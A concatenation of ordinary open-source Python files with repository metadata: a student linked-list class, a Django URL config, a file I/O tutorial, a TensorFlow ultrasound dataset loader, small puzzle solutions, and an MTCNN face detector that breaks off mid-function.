myNode = Node(value)
if self.Size == 0:
self.First = myNode
self.Last = myNode
else:
currentNode = self.First
while currentNode.next is not None:
currentNode = currentNode.next
currentNode.next = myNode
self.Last = myNode
self.Size +=1
return myNode
def remove(self, value):
if self.Size == 0:
return False
else:
currentNode = self.First
try:
while currentNode.next.value != value:
currentNode = currentNode.next
deleteNode = currentNode.next
currentNode.next = deleteNode.next
deleteNode.value = None
except AttributeError:
return False
self.Size -= 1
return deleteNode
def pop(self):
currentNode = self.First
i=0
while i < len(self):
i+=1
currentNode = currentNode.next
if i==0:
print("No existen Nodos")
elif i == 1:
del self.First
print("Ya no hay Nodos")
exit()
else:
cont = 1
nodo = self.First
while cont < len(self)-1:
nodo = nodo.next
cont += 1
self.Last = nodo
#print(f"{nodo} ____{nodo.next}")
self.Last.next = None
self.Size -= 1
def prepend(self, value):
myNode = Node(value)
if self.Size == 0:
self.First = myNode
self.Last = myNode
self.Size = 1
else:
myNode.next = self.First
self.First = myNode
self.Size +=1
def popfisrt(self):
if len(self)==0:
print("No hay nodos")
return False
elif len(self)==1:
emptyNode = Node(" ")
self.First=emptyNode
self.Last = emptyNode
self.Size -= 1
return 0
else:
aux=self.First.next
self.First=aux
self.Size -= 1
def get(self, index):
currentNode = self.First
if index>self.Size:
print("Valor no permitido")
else:
for i in range(index):
currentNode = currentNode.next
return currentNode
def insert (self, index, value):
myNode = Node(value)
currentNode = self.First
if index>self.Size:
print("Valor no permitido")
elif index == 0:
self.First = myNode
myNode.next=currentNode
self.Size +=1
else:
for i in range(index-1):
currentNode = currentNode.next
aux=currentNode.next
currentNode.next=myNode
myNode.next=aux
self.Size+=1
def set (self, index, value):
myNode = self.get(index)
myNode.value=value
def removeIndex(self, index):
currentNode = self.First
if index == len(self):
self.pop
else:
for i in range(index-1):
currentNode=currentNode.next
deletedNode = currentNode.next
currentNode.next = deletedNode.next
deletedNode.value = None
self.Size-=1
def __len__(self):
return self.Size
def __str__(self):
String = "["
currentNode = self.First
for i in range(len(self)):
String += str(currentNode)
if i is not len(self)-1:
String += str(", ")
currentNode = currentNode.next
String += "]"
return String
myList = LinkedList()
|
MarioAguilarReal/Python
|
Programación Estructurada/Listas Ligadas/LinkedList.py
|
LinkedList.py
|
py
| 4,106 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39104149472
|
from django.urls import path
from . import views
app_name = 'orders'
urlpatterns = [
path('checkout', views.checkout, name='checkout'),
path('order_details', views.order_detail, name='order_details'),
path('orders', views.orders, name='orders'),
path('create_order/', views.create_order, name='create_order'),
]
|
suveydacan/book_shopping_microservice
|
MyProject/orders/urls.py
|
urls.py
|
py
| 333 |
python
|
en
|
code
| 1 |
github-code
|
6
|
30763965983
|
# Obj: Data persistance
# Opt1: External files
# Opt2: DB
# Procedure:
# Create the external file.
# Open the file
# Manipulate the file
# Close the file
from io import open
# First parameter file name, second parameter mode to open (read, write)
textFile = open('file.txt', 'w')
line = 'Great day to code Python \nIsn\'t it?'
textFile.write(line) # writing on the file
textFile.close() # closing the file
textFile = open('file.txt', 'r') # Opens the file on read mode
text = textFile.read() # reads the file
textFile.close() # closing the file
print(text)
textFile = open('file.txt', 'r') # Opens the file on read mode
# reads the file line by line saving each one of themn on a list
textLines = textFile.readlines()
textFile.close() # closes the file
print(textLines[0])
# a parameter allows to append lines to the text file
textFile = open('file.txt', 'a')
textFile.write('\nEveryday it\'s a god day to code')
textFile.close()
textFile = open('file.txt', 'r')
print(textFile.read())
print(textFile.read()) # After executing the first read command, the pointer stays at the end of the file, so the second time it's executed there are no more lines ahead and it won't print anything
# seek sets the pointer to the given position, in this case index = 0
textFile.seek(0)
print(textFile.read())
print(textFile.read(11)) # Starts reading on the given position (11)
textFile.close()
# Writing and reading mode, sets the pointer on the first postion
textFile = open('file.txt', 'r+')
|
Giorc93/PythonCourse
|
ExternalFiles/TextFiles/externalText.py
|
externalText.py
|
py
| 1,508 |
python
|
en
|
code
| 1 |
github-code
|
6
|
44098268965
|
import tensorflow as tf
import numpy as np
from typing import Union, Optional, Sequence
from pathlib import Path
from dui.datasets.hdf5datasetfactory import HDF5DatasetFactory
from dui.utils.signal import compress_db
from dui.layers.utils import get_channel_axis
def create_image_dataset(
path: Union[str, Path],
name: str,
factor: Union[str, float] = '0db',
# TODO: None as default or 1?
signal_type: str = 'rf',
# TODO: None or 'raw' as default?
data_format: str = 'channels_last',
# TODO: patch paddings typing elsewhere if validated
# paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
paddings: Optional[Union[Sequence[Sequence[int]], np.ndarray]] = None,
start: int = 0,
stop: Optional[int] = None,
step: int = 1,
slicer: Optional[Sequence[slice]] = None,
batch_size: int = 1,
shuffle: bool = False,
num_parallel_calls: Optional[int] = None,
seed: Optional[int] = None,
) -> tf.data.Dataset:
# Factory
dataset_factory = HDF5DatasetFactory(
path=path,
name=name,
start=start,
stop=stop,
step=step,
slicer=slicer,
shuffle=shuffle,
seed=seed
)
# Check sample shape
base_sample_shape = dataset_factory._output_sample_shape
if len(base_sample_shape) != 2:
raise ValueError(
"Dataset sample must be a 2D array. Current shape: {}".format(
base_sample_shape
)
)
# Normalization factor
if isinstance(factor, str):
attr_key = factor
factor = dataset_factory.attrs.get(attr_key)
if factor is None:
raise ValueError(
"No attribute '{}' for dataset '{}' in '{}'".format(
attr_key, dataset_factory._dataset.name,
dataset_factory._dataset.file.filename
)
)
elif type(factor) in (int, float):
pass
else:
raise TypeError("Unsupported type for 'factor'")
# Create dataset
dataset = dataset_factory.create_dataset()
# TODO: include factor directly and specialize the pre-processing
# for US-specific only?
# Hack to avoid having an <unknown> shape (probably unsafe)
# TODO: handle this in factory or by sub-classing tf.data.Dataset
# Note: Probably below some Dataset._element_structure properties
# Note: most probably not compatible with 1.15
dataset._element_structure._shape = tf.TensorShape(base_sample_shape)
# Pre-processing
dataset = dataset.batch(batch_size=batch_size)
# TODO: use `dataset.padded_batch` instead and remove following
# `paddings` option from following pre-processing
# TODO: apply normalization factor before
dataset = _preprocess_image_dataset(
dataset=dataset,
factor=factor,
data_format=data_format,
signal_type=signal_type,
paddings=paddings,
num_parallel_calls=num_parallel_calls
)
return dataset
def _preprocess_image_dataset(
dataset: tf.data.Dataset,
factor: Optional[float] = None,
data_format: str = 'channels_last',
signal_type: Optional[str] = None,
paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
num_parallel_calls: Optional[int] = None
) -> tf.data.Dataset:
# Specify pre-processing function as a mapping function
def map_func(x: tf.Tensor) -> tf.Tensor:
return _image_preproc_fun(
x,
factor=factor,
data_format=data_format,
signal_type=signal_type,
paddings=paddings
)
return dataset.map(
map_func=map_func,
num_parallel_calls=num_parallel_calls
)
def _image_preproc_fun(
x: tf.Tensor,
factor: Optional[float] = None,
data_format: str = 'channels_last',
signal_type: Optional[str] = None,
paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
) -> tf.Tensor:
# TODO: check inputs
x = tf.convert_to_tensor(x)
# Normalization factor
if factor:
# TODO: apply factor before and keep this pre-proc
# function only for US-specific transformations?
x /= factor
# Paddings
if paddings is not None:
# TODO: would probably make more sense to remove paddings
# from this US-specific pre-processing function
# x = _batched_pad(x, paddings=paddings)
paddings = np.array(paddings)
valid_pad_shape = 2, 2
pad_shape = paddings.shape
# TODO: this test is too restrictive in general (e.g. 3D)
# but ok for now as we only work on 2D images
if pad_shape != valid_pad_shape:
raise ValueError(
"Incompatible 'paddings' shape. Current: {}. "
"Expected {}".format(pad_shape, valid_pad_shape)
)
paddings = [[0, 0], *paddings.tolist()]
pad_kwargs = {
'paddings': tf.constant(paddings, dtype='int32'),
'mode': 'CONSTANT',
'constant_values': 0
}
x = tf.pad(x, **pad_kwargs)
# Channel axis
channel_axis = get_channel_axis(data_format=data_format)
# Signal type
if signal_type is not None:
if signal_type == 'rf':
x = tf.math.real(x)
elif signal_type == 'iq':
# Stack complex components in channels
x = tf.stack((tf.math.real(x), tf.math.imag(x)), axis=channel_axis)
elif signal_type == 'env':
# Takes modulus of complex IQ signal
x = tf.math.abs(x)
elif signal_type == 'bm':
# Takes modulus of complex IQ signal
x = tf.math.abs(x)
# Compress to dB
x = compress_db(tensor=x)
elif signal_type == 'raw':
pass
else:
raise ValueError("Invalid signal type")
# Expand dimension
if signal_type != 'iq':
x = tf.expand_dims(x, axis=channel_axis)
return x
|
dperdios/dui-ultrafast
|
dui/datasets/utils.py
|
utils.py
|
py
| 6,117 |
python
|
en
|
code
| 14 |
github-code
|
6
|
11004498308
|
class Solution:
def findLongestChain(self, pairs: List[List[int]]) -> int:
pairs.sort(key = lambda a:a[0])
dp = [1] * len(pairs)
ans = 1
for i in range(len(pairs)):
for j in range(i):
if pairs[i][0] > pairs[j][1]:
dp[i] = max(dp[j]+1, dp[i])
ans = max(dp[i], ans)
return ans
|
xixihaha1995/CS61B_SP19_SP20
|
temp/toy/python/646. Maximum Length of Pair Chain.py
|
646. Maximum Length of Pair Chain.py
|
py
| 386 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31653944297
|
#!/usr/bin/env python3
""" Using p022_names.txt, a 46K text file containing over five-thousand first names,
begin by sorting it into alphabetical order. Then working out the
alphabetical value for each name, multiply this value by its alphabetical position in the list
to obtain a name score.
For example, when the list is sorted into alphabetical order, COLIN, which is worth
3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of
938 × 53 = 49714.
What is the total of all the name scores in the file?
"""
import csv
alphabet = "_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
with open('p022_names.txt', newline='') as f:
reader = csv.reader(f)
name_list = next(reader)
name_list.sort()
total = 0
for name in name_list:
name_score = 0
for letter in name:
name_score += alphabet.index(letter)
name_score *= (name_list.index(name) + 1)
total += name_score
print(f'Total score {total}')
|
ilee38/practice-python
|
coding_problems/project_e/22_names_scores.py
|
22_names_scores.py
|
py
| 1,010 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72000467069
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import builtins
import gc
import os
import time
import numpy as np
import torch
from trident.backend.common import *
from trident.backend.opencv_backend import image2array
from trident.backend.pytorch_backend import *
from trident.backend.pytorch_backend import Layer, Sequential, load, get_device, fix_layer
from trident.backend.pytorch_ops import *
from trident.data.image_common import *
from trident.data.utils import download_model_from_google_drive
from trident.data.vision_transforms import Normalize
from trident.layers.pytorch_activations import PRelu
from trident.layers.pytorch_layers import *
from trident.layers.pytorch_pooling import *
from trident.optims.pytorch_trainer import ImageDetectionModel
__all__ = ['Pnet', 'Rnet', 'Onet', 'Mtcnn']
_session = get_session()
_device = get_device()
_epsilon = _session.epsilon
_trident_dir = _session.trident_dir
dirname = os.path.join(_trident_dir, 'models')
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError:
# Except permission denied and potential race conditions
# in multi-threaded environments.
pass
def p_net():
return Sequential(
Conv2d((3, 3), 10, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((3, 3), 16, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
ModuleDict(
{'confidence': Conv2d((1, 1), 1, strides=1, auto_pad=False, use_bias=True, activation='sigmoid',
name='conv4_1'),
'box': Conv2d((1, 1), 4, strides=1, auto_pad=False, use_bias=True, name='conv4_2'),
'landmark': Conv2d((1, 1), 10, strides=1, auto_pad=False, use_bias=True, name='conv4_3')},
is_multicasting=True)
, name='pnet')
def r_net():
return Sequential(
Conv2d((3, 3), 28, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 48, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((2, 2), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
Flatten(),
Dense(128, activation=None, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv5_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv5_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv5_3')}, is_multicasting=True)
, name='rnet')
def o_net():
return Sequential(
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((2, 2), 128, strides=1, auto_pad=False, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
Flatten(),
Dense(256, activation=None, use_bias=True, name='conv5'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv6_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv6_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv6_3')}, is_multicasting=True)
, name='onet')
def Pnet(pretrained=True,
input_shape=(3, 12, 12),
freeze_features=True,
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 12, 12)
pnet = ImageDetectionModel(input_shape=input_shape, output=p_net())
pnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')
recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))
pnet.model = recovery_model
pnet.model.input_shape = input_shape
pnet.model.to(_device)
return pnet
def Rnet(pretrained=True,
input_shape=(3, 24, 24),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 24, 24)
rnet = ImageDetectionModel(input_shape=input_shape, output=r_net())
rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph', dirname, 'rnet.pth')
recovery_model = load(os.path.join(dirname, 'rnet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
rnet.model = recovery_model
return rnet
def Onet(pretrained=True,
input_shape=(3, 48, 48),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 48, 48)
onet = ImageDetectionModel(input_shape=(3, 48, 48), output=o_net())
onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_', dirname, 'onet.pth')
recovery_model = load(os.path.join(dirname, 'onet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
onet.model = recovery_model
return onet
class DetectorHead(Layer):
def __init__(self, cellsize=12, threshold=0.5, min_size=5, **kwargs):
super(DetectorHead, self).__init__(**kwargs)
self.cellsize = cellsize
self.detection_threshold = threshold
self.min_size = min_size
self._built = True
def forward(self, input, **kwargs):
boxprobs, boxregs, landscape = input.value_list
boxprobs = boxprobs[0]
height, width = boxprobs.shape[1:]
if boxprobs.size(0) == 2:
boxprobs = boxprobs[1:, :, :]
strides = 2
boxregs = boxregs[0]
input_shape = boxprobs.size()
grid = meshgrid(boxprobs.size(1), boxprobs.size(2))
grid = grid.view(2, -1)
score = boxprobs[0]
y, x = torch.where(score >= self.detection_threshold)
boxregs = boxregs.permute(1, 2, 0)
score = score[(y, x)]
reg = boxregs[(y, x)].transpose(1, 0)
bb = torch.stack([x, y], dim=0)
q1 = (strides * bb + 1)
q2 = (strides * bb + self.cellsize - 1 + 1)
w = q2[0, :] - q1[0, :] + 1
h = q2[1, :] - q1[1, :] + 1
b1 = q1[0, :] + reg[0, :] * w
b2 = q1[1, :] + reg[1, :] * h
b3 = q2[0, :] + reg[2, :] * w
b4 = q2[1, :] + reg[3, :] * h
boxs = torch.stack([b1, b2, b3, b4, score], dim=-1)
# keep =torchvision.ops.boxes.remove_small_boxes(boxs[:,:4],min_size=self.min_size)
# boxs=boxs[keep]
# print('total {0} boxes cutoff={1} '.format(len(x), cutoff))
if boxs is None or len(boxs.size()) == 0:
return None
elif len(boxs.size()) == 1:
boxs = boxs.unsqueeze(0)
return boxs
def remove_useless_boxes(boxes, image_size=None, min_size=5):
height, width = image_size if image_size is not None else (None, None)
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
boxes = boxes[area > min_size * min_size]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
greater0 = x1.gt(0).float() * x2.gt(0).float() * y1.gt(0).float() * y1.gt(0).float()
boxes = boxes[greater0 > 0]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
w = (x2 - x1)
boxes = boxes[w > 1]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
h = (y2 - y1)
boxes = boxes[h > 1]
return boxes
class Mtcnn(ImageDetectionModel):
def __init__(self, pretrained=True, min_size=10, detection_threshold=(0.4, 0.7, 0.9), nms_threshold=(0.9, 0.8, 0.5),
**kwargs):
self.pnet = Pnet(pretrained=pretrained, input_shape=(3, 12, 12)).model
self.rnet = Rnet(pretrained=pretrained, input_shape=(3, 24, 24)).model
self.onet = Onet(pretrained=pretrained, input_shape=(3, 48, 48)).model
super(Mtcnn, self).__init__(input_shape=(3, 12, 12), output=self.pnet)
self.min_size = min_size
self.detection_threshold = detection_threshold
self.nms_threshold = nms_threshold
self.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
def get_image_pyrimid(self, img, min_size=None, factor=0.709):
if min_size is None:
min_size = self.min_size
min_face_area = (min_size, min_size)
h = img.shape[0]
w = img.shape[1]
minl = np.amin([h, w])
m = 12.0 / min_size
minl = minl * m
# 收集縮放尺度以及對應縮圖
scales = []
images = []
factor_count = 0
while minl >= 12:
scales += [m * np.power(factor, factor_count)]
scaled_img = rescale(scales[-1])(img.copy())
images.append(scaled_img)
minl = minl * factor
factor_count += 1
return images, scales
def generate_bboxes(self, probs, offsets, scale, threshold):
"""
基於Pnet產生初始的候選框
"""
stride = 2
cell_size = 12
# 透過np.where挑出符合基於門檻值的特徵圖位置(xy座標)
inds = where(probs > threshold)
'''
>>> a =np.array([[1,2,3],[4,5,6]])
>>> np.where(a>1)
(array([0, 0, 1, 1, 1]), array([1, 2, 0, 1, 2]))
'''
# 如果沒有區域滿足機率門檻值,則傳回空array
if inds[0].size == 0:
return np.array([])
# 根據pnet輸出的offset區域產生對應的x1,y1,x2,y2座標
tx1, ty1, tx2, ty2 = [offsets[0, i, inds[0], inds[1]] for i in range(4)]
offsets = stack([tx1, ty1, tx2, ty2], axis=-1)
# 以及抓出對應的機率值
score = probs[inds[0], inds[1]]
# 由於Pnet輸入的是基於圖像金字塔縮放尺度對應的圖片,因此需要根據縮放尺度來調整候選框座標,以還原成真實圖片的尺度
# 根據 候選框、機率值、offset來排列
bounding_boxes = concate([
round((stride * inds[1] + 1.0) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0) / scale).expand_dims(-1),
round((stride * inds[1] + 1.0 + cell_size) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0 + cell_size) / scale).expand_dims(-1),
score.expand_dims(-1), offsets
], axis=-1)
print(bounding_boxes.shape)
# 將bounding_boxes由原本[框屬性數量,框個數]的形狀轉置為[框個數,框屬性數量]
return bounding_boxes
def convert_to_square(self, bboxes):
"""Convert bounding boxes to a square form.
Arguments:
bboxes: a float numpy array of shape [n, 5].
Returns:
a float numpy array of shape [n, 5],
squared bounding boxes.
"""
square_bboxes = zeros_like(bboxes)
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
h = y2 - y1 + 1.0
w = x2 - x1 + 1.0
max_side = maximum(h, w)
square_bboxes[:, 0] = x1 + w * 0.5 - max_side * 0.5
square_bboxes[:, 1] = y1 + h * 0.5 - max_side * 0.5
square_bboxes[:, 2] = square_bboxes[:, 0] + max_side - 1.0
square_bboxes[:, 3] = square_bboxes[:, 1] + max_side - 1.0
return square_bboxes
# 校準候選框座標
# 將offset對應至圖片長寬的線性縮放來獲得更新的候選框精調後座標
def calibrate_box(self, bboxes, offsets):
"""Transform bounding boxes to be more like true bounding boxes.
'offsets' is one of the outputs of the nets.
Arguments:
bboxes: a float numpy array of shape [n, 5].
offsets: a float numpy array of shape [n, 4].
Returns:
a float numpy array of shape [n, 5].
"""
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
w = x2 - x1 + 1.0
h = y2 - y1 + 1.0
# w [w_len, 1]
w = expand_dims(w, 1)
# h [h_len, 1]
h = expand_dims(h, 1)
translation = concate([w, h, w, h], axis=-1) * offsets
bboxes[:, 0:4] = bboxes[:, 0:4] + translation
return bboxes
# 基於tensor計算nms
def nms(self, box_scores, overlap_threshold=0.5, top_k=-1):
"""Non-maximum suppression.
Arguments:
box_scores: a float numpy array of shape [n, 5],
where each row is (xmin, ymin, xmax, ymax, score).
overlap_threshold: a float number.
Returns:
list with indices of the selected boxes
"""
# 計算面積
def area_of(left_top, right_bottom):
"""Compute the areas of rectangles given two corners.
Args:
left_top (N, 2): left top corner.
right_bottom (N, 2): right bottom corner.
Returns:
area (N): return the area.
"""
hw = right_bottom - left_top
return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)
# 計算IOU(交集/聯集)
def iou_of(boxes0, boxes1, eps=1e-5):
"""Return intersection-over-union (Jaccard index) of boxes.
Args:
boxes0 (N, 4): ground truth boxes.
boxes1 (N or 1, 4): predicted boxes.
eps: a small number to avoid 0 as denominator.
Returns:
iou (N): IoU values.
"""
overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])
overlap_right_bottom = minimum(boxes0[..., 2:], boxes1[..., 2:])
overlap_area = area_of(overlap_left_top, overlap_right_bottom)
area0 = area_of(boxes0[..., :2], boxes0[..., 2:])
area1 = area_of(boxes1[..., :2], boxes1[..., 2:])
return overlap_area / (area0 + area1 - overlap_area + eps)
# 如果沒有有效的候選區域則回傳空的清單
box_scores = to_tensor(box_scores)
if len(box_scores) == 0:
return []
score = box_scores[:, 4]
boxes = box_scores[:, :4]
# 存放過關的索引值
picked = []
# 依照機率信心水準升冪排序
indexes = argsort(score, descending=False)
while len(indexes) > 0:
# 如此一來,最後一筆即是信心水準最高值
# 加入至過關清單中
current = indexes[-1]
picked.append(current.item())
# 計算其餘所有候選框與此當前框之間的IOU
if 0 < top_k == len(picked) or len(indexes) == 1:
break
current_box = boxes[current, :]
current_score = score[current]
# 除了最後一筆以外的都是其餘框
indexes = indexes[:-1]
rest_boxes = boxes[indexes, :]
iou = iou_of(
rest_boxes,
expand_dims(current_box, axis=0),
)
# IOU未超過門檻值的表示未與當前框重疊,則留下,其他排除
indexes = indexes[iou <= overlap_threshold]
return picked
def detect(self, image):
"""
Arguments:
image: 基於RGB排列的圖像(可以是路徑或是numpy向量)
Returns:
輸出為候選框以及對應的五官特徵點
"""
# 暫存此原圖
image = image2array(image)
self.image = image
self.height, self.width = image.shape[:2]
min_length = min(self.height, self.width)
# 第一階段: 候選 pnet
bounding_boxes = []
# 先計算圖像金字塔的各個縮放比率
images, scales = self.get_image_pyrimid(image, min_size=self.min_size, factor=0.707)
# 每個縮放比率各執行一次Pnet(全卷積網路)
for img, scale in zip(images, scales):
# 生成該尺度下的候選區域
# 透過機率值門檻做篩選後再透過nms去重複
boxes = self.run_first_stage(img, scale)
print('Scale:', builtins.round(scale * 10000) / 10000.0, 'Scaled Images:', img.shape, 'bboxes:', len(boxes),
flush=True)
if boxes.ndim == 1:
boxes.expand_dims(0)
bounding_boxes.append(boxes)
# 將各個尺度所檢測到的候選區域合併後
bounding_boxes = [i for i in bounding_boxes if i is not None]
bounding_boxes = concate(bounding_boxes, axis=0)
print('totl bboxes:', len(bounding_boxes))
# 將候選框的座標做一下校準後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes[:, 0:5], bounding_boxes[:, 5:])
keep = self.nms(bounding_boxes[:, 0:5], self.nms_threshold[0])
bounding_boxes = bounding_boxes[keep]
# 將框盡可能調整成正方形
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4])
print('totl bboxes after nms:', len(bounding_boxes))
# # 將這階段的候選框圖輸出
# pnet_img = self.image.copy()
# for box in bounding_boxes[:, :4]:
# pnet_img = plot_one_box(box, pnet_img, (255, 128, 128), None, 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(pnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
# 第二階段: 精調 rnet
# 將第一階段留下來的候選框區域挖下來,縮放成24*24大小,交給rnet做確認以及框座標精調
img_boxes = self.get_image_boxes(bounding_boxes, size=24)
print('RNet!')
probs = []
offsets = []
if len(img_boxes) > 16:
for i in range(len(img_boxes) // 16 + 1):
if i * 16< len(img_boxes):
output = self.rnet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(to_numpy(output['confidence']))
offsets.append(to_numpy(output['box']))
del output
probs = np.concatenate(probs, axis=0)
offsets =np.concatenate(offsets, axis=0)
else:
output = self.rnet(to_tensor(img_boxes))
probs = to_numpy(output['confidence']) # 形狀為 [n_boxes, 1]
offsets = to_numpy(output['box']) # 形狀為 [n_boxes, 4]
# 根據機率門檻值排除機率值較低的框
keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]
bounding_boxes = to_numpy(bounding_boxes)[keep]
bounding_boxes=np.concatenate([bounding_boxes[:,:4],probs[keep, 0].reshape((-1,1))],axis=1)
#bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
print('totl bboxes:', len(bounding_boxes))
# 將框的座標做精調後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
keep = self.nms(bounding_boxes, self.nms_threshold[1])
bounding_boxes = bounding_boxes[keep]
# 將框盡可能調整成正方形
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4]).copy()
print('totl bboxes after nms:', len(bounding_boxes))
# # 將這階段的候選框圖輸出
# rnet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# rnet_img = plot_one_box(box, rnet_img, (255, 128, 128), None, 2)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(rnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
# 第三階段: 輸出 onet
img_boxes = self.get_image_boxes(bounding_boxes, size=48)
if len(img_boxes) == 0:
return [], []
print('ONet!')
probs = []
offsets = []
landmarks = []
if len(img_boxes) > 16:
for i in range(len(img_boxes) //16 + 1):
if i * 16 < len(img_boxes):
output = self.onet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(output['confidence'].copy())
offsets.append(output['box'].copy())
landmarks.append(output['landmark'].copy())
del output
probs = concate(probs, axis=0)
offsets = concate(offsets, axis=0)
landmarks = concate(landmarks, axis=0)
else:
output = self.onet(to_tensor(img_boxes))
probs = output['confidence'] # 形狀為 [n_boxes, 1]
offsets = output['box'] # 形狀為 [n_boxes, 4]
# 只有這一階段需要檢視人臉特徵點
landmarks = output['landmark'] # 形狀為 [n_boxes, 10]
# 根據機率門檻值排除機率值較低的框
keep = where(probs[:, 0] > self.detection_threshold[2])[0]
bounding_boxes = bounding_boxes[keep]
bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
landmarks = landmarks[keep]
print('totl bboxes:', len(bounding_boxes))
# 將框的座標做精調後計算對應的臉部特徵點位置,然後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
# 根據模型輸出計算人臉特徵點
width = bounding_boxes[:, 2] - bounding_boxes[:, 0] + 1.0
height = bounding_boxes[:, 3] - bounding_boxes[:, 1] + 1.0
xmin, ymin = bounding_boxes[:, 0], bounding_boxes[:, 1]
landmarks[:, 0:5] = expand_dims(xmin, 1) + expand_dims(width, 1) * landmarks[:, 0:5]
landmarks[:, 5:10] = expand_dims(ymin, 1) + expand_dims(height, 1) * landmarks[:, 5:10]
# 做最後一次nms
keep = self.nms(bounding_boxes, self.nms_threshold[2])
print('totl bboxes after nms:', len(bounding_boxes))
bounding_boxes = bounding_boxes[keep]
landmarks = landmarks[keep]
probs = probs[keep]
# # 將這階段的候選框圖輸出
# onet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# onet_img = plot_one_box(box, onet_img, (255, 128, 128), None, 2)
# for landmark in landmarks:
# landmarks_x = landmark[:5]
# landmarks_y = landmark[5:]
# for i in range(5):
# cv2.circle(onet_img, (int(landmarks_x[i]), int(landmarks_y[i])), 2, (255, 128, 255), 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(onet_img.astype(np.uint8))
gc.collect()
return self.image.copy(), bounding_boxes, probs, landmarks
# 執行第一階段
def run_first_stage(self, img, scale):
"""Run P-Net, generate bounding boxes, and do NMS.
Arguments:
img: an instance of PIL.Image.
scale: a float number,
scale width and height of the image by this number.
Returns:
a float numpy array of shape [n_boxes, 9],
